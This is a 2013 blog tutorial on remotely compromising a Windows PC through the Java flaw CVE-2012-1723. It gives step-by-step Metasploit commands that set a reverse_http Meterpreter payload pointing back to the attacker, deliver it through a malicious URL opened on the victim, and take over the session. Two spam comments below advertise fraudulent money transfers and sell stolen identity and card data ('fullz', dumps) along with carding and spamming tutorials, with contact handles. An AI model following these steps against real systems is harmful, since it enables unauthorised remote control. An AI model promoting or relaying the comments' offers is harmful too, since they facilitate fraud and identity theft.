Tuesday, December 17, 2013

Hacking Remote Pc


 


Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution 

CVE-2012-1723: A vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.

Requirement:

  • Attacker Machine: Backtrack
  • Victim Machine: Windows (install JRE un-patched version  )
Step1: Launch the Metasploit console
Open the Terminal in the Attacker Machine(Backtrack).
Type "msfupdate" , this will update the metasploit with latest modules.
Now type "msfconsole" to get interaction with the Metasploit framework.

Step 2:
Type "use exploit/multi/browser/java_verifier_field_access" and follow the below commands:


msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit

If you don't know what i am talking about , please read my previous tutorial.

Step 3:
If you follow the above commands correctly, you will get the following result.

Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and creates a new session.

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control the Target.

References:
  • POC: http://schierlm.users.sourceforge.net/CVE-2012-1723.html
  • Metasploit Module: http://www.exploit-db.com/exploits/19717/

 


Logon to http://onlinehackingtutorials.blogspot.in/ @ Copyright 2014 Pradeep Lodhi (Software Developer)


2 comments:

  1. HACKER IMPOSSIBLE!!! HACKER IMPOSSIBLE!!! HACKER IMPOSSIBLE!!!
    Make Millions Of Dollars Today With The World’s Best Hackers.
    www.hackerimpossible.com Is The Place To Be For Your:
    ||Bank Transfers||Western Union Money Transfers||Electronics Shipment||PayPal Top-Up|| And Many More||
    All Methods Are 100% Safe & Authentic.
    • Get Thousands Of Dollars Loaded Into Your Bank Account For Only A Little Fee.
    • Get Dozens Of Latest Electronics Shipped For You At Incredibly Cheap Service Fee.
    • Get Thousands Of Dollars Loaded Into Your PayPal Account For Only A Little Fee.
    • Get Thousands Of Dollars Sent To You Via Western Union For Only A Little Fee.
    Contact Them Today
    Visit: www.hackerimpossible.com For More Information.
    ................./

    ReplyDelete
  2. Hello To All !

    Hey Guy's very fresh fullz & Tools are now available.
    We're offering bulk fullz & Many packages in offers.
    If you wanna learn anything regarding Hac-king, Carding, Applying Loan Online,
    Spa-mming, Filling for benefits.
    We'll provide you fresh & legit stuff with proper guidance & assistance.

    Stuff we're offering :

    SSN DOB DL Fullz with High CS 700+
    CC Fullz with CVV+SSN info & address (all USA banks)
    Dumps with pin & complete dumps using tutorials for cash outs
    Business EIN fullz fresh
    Full packages with all related & necessary tools & Tutorials
    Hacki-ng, Spamm-ing, C-arding, Spying, Cloning
    Working Loan Methods with all info

    Other tools are also available
    Just try our services at once
    you'll never be disappointed

    For further info
    Feel Free to ping us

    WA/TG = +92 317 272 1122
    TG/ICQ = @killhacks
    exploit.tools 4u at gmail dot com
    Wickr/Skype = @peeterhacks

    Will glad to serve you guy's
    Thank you

    ReplyDelete

Member
About Us - Privacy Policy - Contact Us
@ Copyright 2013 Powered By Blogger